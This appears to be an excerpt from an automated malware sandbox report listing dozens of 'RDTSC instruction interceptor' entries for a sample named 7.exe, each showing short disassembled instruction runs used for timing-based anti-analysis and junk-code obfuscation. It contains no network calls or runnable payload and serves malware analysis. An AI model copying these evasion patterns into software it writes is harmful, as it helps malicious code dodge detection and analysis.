Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E1DF4C second address: E1DF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E1DF55 second address: E1DF79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 jmp 00007FDB98EABA35h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E1DF79 second address: E1DF92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B557 second address: E4B55D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B55D second address: E4B562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B562 second address: E4B577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B577 second address: E4B580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B580 second address: E4B584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B973 second address: E4B979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B979 second address: E4B97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B97F second address: E4B984 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B984 second address: E4B990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4B990 second address: E4B99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDB98EAF3C6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4BC69 second address: E4BC88 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDB98EABA26h 0x00000008 jmp 00007FDB98EABA30h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C08C second address: E4C0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FDB98EAF3CEh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C0A0 second address: E4C0B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007FDB98EABA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C0B4 second address: E4C0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C37E second address: E4C388 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDB98EABA26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C54B second address: E4C551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C551 second address: E4C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E2169C second address: E216B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FDB98EAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FDB98EAF3CEh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4C6A6 second address: E4C6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4CE79 second address: E4CE80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E4CFBE second address: E4CFDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FDB98EABA2Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E50BB2 second address: E50BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E56E68 second address: E56E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E56E70 second address: E56E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3D0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E56E86 second address: E56E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E572BB second address: E572CE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDB98EAF3C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E58D17 second address: E58D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E58D1B second address: E58D2C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDB98EAF3C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E58D2C second address: E58D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E58D31 second address: E58D74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FDB98EAF3EEh 0x0000000f jmp 00007FDB98EAF3D6h 0x00000014 pushad 0x00000015 jg 00007FDB98EAF3C6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5BEC7 second address: E5BF22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDB98EABA2Ch 0x00000008 jmp 00007FDB98EABA2Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 add dword ptr [esp], 3A3A7F17h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FDB98EABA28h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 call 00007FDB98EABA29h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edi 0x0000003a pop edi 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5BF22 second address: E5BF59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FDB98EAF3C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FDB98EAF3CBh 0x00000013 jp 00007FDB98EAF3CCh 0x00000019 jng 00007FDB98EAF3C6h 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDB98EAF3CAh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5BF59 second address: E5BF70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FDB98EABA2Ch 0x00000011 jne 00007FDB98EABA26h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5BF70 second address: E5BF8A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FDB98EAF3C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jc 00007FDB98EAF3D4h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C0B0 second address: E5C0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C0B6 second address: E5C0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C318 second address: E5C31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C5BF second address: E5C5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C5C3 second address: E5C5DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDB98EABA2Ah 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C955 second address: E5C95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C95B second address: E5C95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5C95F second address: E5C979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5CAAA second address: E5CAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FDB98EABA2Fh 0x0000000f jp 00007FDB98EABA26h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jnl 00007FDB98EABA2Ch 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5CAE9 second address: E5CAEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5CAEF second address: E5CAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5D417 second address: E5D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5F9C5 second address: E5F9E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDB98EABA38h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5F75D second address: E5F761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E60383 second address: E603FD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDB98EABA28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jp 00007FDB98EABA2Ch 0x00000012 push ebx 0x00000013 jp 00007FDB98EABA26h 0x00000019 pop ebx 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FDB98EABA28h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov dword ptr [ebp+122D3984h], ecx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FDB98EABA28h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 push 00000000h 0x0000005a add dword ptr [ebp+122D293Ah], esi 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6017B second address: E6018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E603FD second address: E60402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E60402 second address: E60408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E60408 second address: E6040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6040C second address: E60422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDB98EAF3CAh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E615CC second address: E615E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E615E9 second address: E61625 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDB98EAF3DEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDB98EAF3D6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6238E second address: E623DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FDB98EABA26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D2951h], esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FDB98EABA28h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 jmp 00007FDB98EABA2Ch 0x0000003a xchg eax, ebx 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E64192 second address: E64208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FDB98EAF3C8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D3AF5h] 0x0000002b push 00000000h 0x0000002d jng 00007FDB98EAF3E7h 0x00000033 pushad 0x00000034 jmp 00007FDB98EAF3D9h 0x00000039 mov dword ptr [ebp+122D39B3h], ebx 0x0000003f popad 0x00000040 push 00000000h 0x00000042 mov ebx, dword ptr [ebp+122D2C9Dh] 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push ebx 0x0000004c jmp 00007FDB98EAF3D2h 0x00000051 pop ebx 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E64208 second address: E6420E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6420E second address: E64212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E65248 second address: E6524C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E652E5 second address: E652ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6610A second address: E66118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FDB98EABA2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E65432 second address: E65436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E66118 second address: E66184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 add ebx, dword ptr [ebp+122D2D0Dh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FDB98EABA28h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a adc ebx, 05AD5A86h 0x00000030 mov ebx, 66B30E82h 0x00000035 mov dword ptr [ebp+122D3921h], eax 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FDB98EABA28h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000016h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov dword ptr [ebp+1244B231h], edi 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E65436 second address: E6545D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FDB98EAF3C6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDB98EAF3D3h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E66184 second address: E66188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6545D second address: E654CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bx, dx 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FDB98EAF3C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D3A89h] 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a pushad 0x0000003b jc 00007FDB98EAF3CBh 0x00000041 sbb cx, 9DCFh 0x00000046 mov cx, ax 0x00000049 popad 0x0000004a jmp 00007FDB98EAF3CEh 0x0000004f mov eax, dword ptr [ebp+122D1651h] 0x00000055 mov bh, dl 0x00000057 push FFFFFFFFh 0x00000059 mov dword ptr [ebp+12465DFCh], esi 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E66188 second address: E6618E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E67249 second address: E6724E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E6A201 second address: E6A24B instructions: 0x00000000 rdtsc 0x00000002 js 00007FDB98EABA28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDB98EABA31h 0x00000010 nop 0x00000011 sub dword ptr [ebp+122D1BA8h], eax 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+12469138h], edx 0x0000001f or bx, A02Ah 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D187Bh], edi 0x0000002c xchg eax, esi 0x0000002d jg 00007FDB98EABA34h 0x00000033 pushad 0x00000034 jng 00007FDB98EABA26h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E692E7 second address: E692F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E692F1 second address: E692F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
